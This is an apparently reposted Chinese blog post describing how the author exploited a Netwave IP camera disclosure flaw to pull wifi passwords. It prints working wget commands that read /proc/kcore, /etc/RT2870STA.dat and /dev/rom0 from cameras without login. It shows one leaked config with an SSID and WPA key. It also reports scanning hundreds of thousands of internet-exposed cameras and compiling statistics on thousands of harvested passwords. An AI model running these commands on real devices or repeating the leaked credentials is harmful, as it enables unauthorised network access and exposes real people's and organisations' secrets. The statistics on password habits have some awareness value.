前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >我是如何通过网络摄像头分析wifi密码的

我是如何通过网络摄像头分析wifi密码的

作者头像
C4rpeDime
发布2018-08-29 11:19:05
8810
发布2018-08-29 11:19:05
举报
文章被收录于专栏:黑白安全黑白安全

看到 exploit-db.com 中报了一个《Netwave IP Camera - Password Disclosure》漏洞, 这个漏洞包含了wifi密码与Web的账号泄露。

顺便使用了 zoomeye 搜索了下全球的这款网络摄像头, 发现用这个还挺多的。

1 背景

1.1 漏洞分析

代码语言:javascript
复制
wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
wget -qO- http://[HOST]:[PORT]//dev/rom0
wget -qO- http://[HOST]:[PORT]/get_status.cgi

1.1.1 get_status.cgi

会泄露当前网络摄像头的一些配置信息:

代码语言:javascript
复制
var sys_ver='21.37.2.47';  
var app_ver='0.0.4.19';  
var alias='002voam';  
var now=1486976881;  
var tz=-28800;  
var alarm_status=0;  
var ddns_status=0;  
var ddns_host='';  
var oray_type=0;  
var upnp_status=0;  
var p2p_status=0;  
var p2p_local_port=20409;  
var msn_status=0;  
var wifi_status=0;  
var temperature=0.0;  
var humidity=0;  
var tridro_error='';

1.1.2 /etc/RT2870STA.dat

这里文件就是一个配置文件, 这里可以得到SSID与wifi密码。

代码语言:javascript
复制
[Default]
SSID=hang yue office
NetworkType=Infra
Channel=0
AuthMode=WPA2PSK
EncrypType=AES
WPAPSK=hangyuewifi

1.1.3 /proc/kcore

内存的map, 可以直接使用wget下载下来(需要注意这里要把wget进程结束才可以登录)。

我是如何通过网络摄像头分析wifi密码的 无线安全 第1张
我是如何通过网络摄像头分析wifi密码的 无线安全 第1张

2 区域分布

先来看一张使用 ZoomEye 搜索的结果, 可以看到搜索到 315,129 条。

我是如何通过网络摄像头分析wifi密码的 无线安全 第2张
我是如何通过网络摄像头分析wifi密码的 无线安全 第2张

通过筛选分析后 11186 IP中存在包含wifi密码, 其中覆盖了111个国家和地区。

这里近分析了中国香港地区的摄像头:

无wifi密码962个 WEP加密方式728个 WPAPSK加密方式9496个

查询看密码

密码类型统计

存数字 1807 个 存字母 1405 个 字母+数字 5585 个 含特殊字符 1001 个

密码用的最多TOP 10

我是如何通过网络摄像头分析wifi密码的 无线安全 第3张
我是如何通过网络摄像头分析wifi密码的 无线安全 第3张

密码长度统计

我是如何通过网络摄像头分析wifi密码的 无线安全 第4张
我是如何通过网络摄像头分析wifi密码的 无线安全 第4张

看的出大众还是使用8位、10位的密码较多。

我是如何通过网络摄像头分析wifi密码的 无线安全 第5张
我是如何通过网络摄像头分析wifi密码的 无线安全 第5张

附上一张中国香港分析后的图, 红色代表没有密码的wifi, 黄色代表WEP加密方式, 蓝色代表WPAPSK方式。

我是如何通过网络摄像头分析wifi密码的 无线安全 第6张
我是如何通过网络摄像头分析wifi密码的 无线安全 第6张

这个世界范围内存在摄像头密码泄漏的分布图。

这张图示是根据SSID搜索到的一家公司内的IP摄像头截图。

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2018-04-074,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档